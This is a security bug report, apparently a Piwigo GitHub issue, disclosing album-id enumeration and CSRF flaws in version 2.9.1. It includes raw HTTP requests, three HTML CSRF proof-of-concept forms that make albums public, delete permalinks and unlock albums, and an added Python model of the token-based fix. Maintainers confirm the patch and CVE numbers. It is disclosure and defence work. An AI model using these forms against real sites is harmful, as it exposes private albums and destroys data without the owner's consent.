Bug Report: Set administrator private album to public via CSRF & Incorrect Permissions #721

Closed
Akityo opened this issue Jun 28, 2017 · 2 comments

@Akityo

commented Jun 28, 2017

Proof-of-Concept

Version: 2.9.1

Incorrect Permissions in album ID

The public / private tags
Private means that the administrator doesn't want others to know about the album.
But there is a way to know what album he is hiding,
and what the private album's permalink is.

  1. By creating an album, you can see that album ids follow a rule.
  2. So you can brute-force the album id:

GET /piwigo/index.php?/category/757 HTTP/1.1
Host: www.test.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Referer: http://www.test.com/piwigo/index.php?/category/c1c12
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_display_thumbnail=display_thumbnail_classic; pwg_id=513v9ik9uahikec64vu4api2o5
Connection: close

- [√] Response with status 200 means that this album is accessible

- [√] Response with status 301 means that you don’t have the privilege to access.

Based on the brute-force result, you can know the hidden album id.

If the hidden album has a permalink set, then by requesting the album id the permalink is in the response packet.

Now it is time to make it public.

Cross-Site Request Forgery in page permalinks, and in the status, visible and comments sections of page cat_options.

There is no pwg_token in the request.

So

  1. Set private albums to public

<html>
  <!-- CSRF PoC - generated by Akityo -->
  <body>
    <form action="http://www.test.com/piwigo/admin.php?page=cat_options&section=status" method="POST">
      <input type="hidden" name="cat&#95;false&#91;&#93;" value="757" />
      <input type="hidden" name="trueify" value="&#171;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

  2. Permalink delete

<html>
  <!-- CSRF PoC - generated by Akityo -->
  <body>
    <form action="http://www.test.com/piwigo/admin.php">
      <input type="hidden" name="page" value="permalinks" />
      <input type="hidden" name="delete&#95;permanent" value="fffffff" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

  3. Unlock albums

<html>
  <!-- CSRF PoC - generated by Akityo -->
  <body>
    <form action="http://www.test.com/piwigo/admin.php?page=cat_options&section=visible" method="POST">
      <input type="hidden" name="cat&#95;false&#91;&#93;" value="756" />
      <input type="hidden" name="trueify" value="&#171;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Original packet

POST /piwigo/admin.php?page=cat_options&section=status HTTP/1.1
Host: www.test.com
Content-Length: 34
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.test.com
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.test.com/piwigo/admin.php?page=cat_options
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: pwg_display_thumbnail=display_thumbnail_classic; pwg_id=513v9ik9uahikec64vu4api2o5
Connection: close

cat_false%5B%5D=758&trueify=%C2%AB

References: https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)

Discovered by: topsec (Li Zhiqiang)
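The two weaknesses in the report map to two server-side checks: a per-session synchronizer token on the state-changing admin POST (the role the pwg_token added in the fix plays), and a uniform "not found" answer for album ids a visitor may not see, so that sweeping ids no longer separates private albums from nonexistent ones. The following is an added illustration, not Piwigo's own code or the reporter's; the handler names, the secret, the album table and the 404 choice are assumptions made for the example, and the request body is the one from the report above.

```python
# Added example (not Piwigo's own code): a session-bound CSRF token check and a
# uniform response for albums the caller is not allowed to see. Every name, the
# secret and the album table below are constructed for this example.
import hashlib
import hmac
from typing import Dict, List, Optional
from urllib.parse import parse_qs

# Assumption: a per-installation secret that never leaves the server.
SERVER_SECRET = b"constructed-example-secret"


def make_albums() -> Dict[int, Dict[str, str]]:
    """Constructed album table using the ids that appear in the report."""
    return {
        756: {"status": "public", "permalink": "holiday"},
        757: {"status": "private", "permalink": "family-only"},
        758: {"status": "private", "permalink": ""},
    }


def csrf_token(session_id: str) -> str:
    """Token bound to the caller's session. A cross-site page can make the
    browser send the pwg_id cookie, but it cannot read this value, so it
    cannot put it into a forged form."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def check_csrf_token(session_id: str, submitted: Optional[str]) -> bool:
    """Reject a missing token; compare a present one in constant time."""
    if not submitted:
        return False
    return hmac.compare_digest(csrf_token(session_id), submitted)


def handle_cat_options_status(albums: Dict[int, Dict[str, str]],
                              session_id: str, body: str) -> dict:
    """Model of admin.php?page=cat_options&section=status. `body` is the raw
    urlencoded POST body; returns a status code and the ids made public."""
    params = parse_qs(body)
    token = params.get("pwg_token", [None])[0]
    if not check_csrf_token(session_id, token):
        # The PoC body carries no token at all, so a forged request stops here.
        return {"status": 403, "changed": []}
    changed: List[int] = []
    if "trueify" in params:
        for raw in params.get("cat_false[]", []):
            album_id = int(raw)
            if album_id in albums:
                albums[album_id]["status"] = "public"
                changed.append(album_id)
    return {"status": 200, "changed": changed}


def view_album(albums: Dict[int, Dict[str, str]], album_id: int,
               is_admin: bool) -> int:
    """Status code for index.php?/category/<id>. A non-admin gets the same
    answer for a private album and for an id that does not exist, so the
    200-versus-301 difference the report relies on disappears."""
    album = albums.get(album_id)
    if album is None or (album["status"] == "private" and not is_admin):
        return 404
    return 200


if __name__ == "__main__":
    albums = make_albums()
    sid = "513v9ik9uahikec64vu4api2o5"            # session id from the report's cookie
    forged = "cat_false%5B%5D=758&trueify=%C2%AB"  # body from the report, no token
    print(handle_cat_options_status(albums, sid, forged))
    legit = forged + "&pwg_token=" + csrf_token(sid)
    print(handle_cat_options_status(albums, sid, legit))
    print(view_album(albums, 757, False), view_album(albums, 9999, False))
```

The token is an HMAC over the session id rather than a random value stored server-side, so it needs no extra storage and rotates with the session; the important properties are that it is unreadable cross-origin and compared with `hmac.compare_digest`. The 404 choice is one way to close the enumeration gap; any response that is byte-for-byte identical for "private" and "missing" works.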

@flop25 flop25 self-assigned this Jun 28, 2017

flop25 referenced this issue Jun 28, 2017
adding pwg_token on permalink & cat_options
and therefore solving issue:721
@flop25

Member

commented Jun 28, 2017

Thank you for reporting.
I've added the pwg_token.
I opened another one about the permalink answered when requesting a private id.

@fgeek

commented Jul 1, 2017

CVE-2017-10678, CVE-2017-10679, CVE-2017-10680 and CVE-2017-10681 have been assigned for these issues.

plegall added a commit that referenced this issue Jul 3, 2017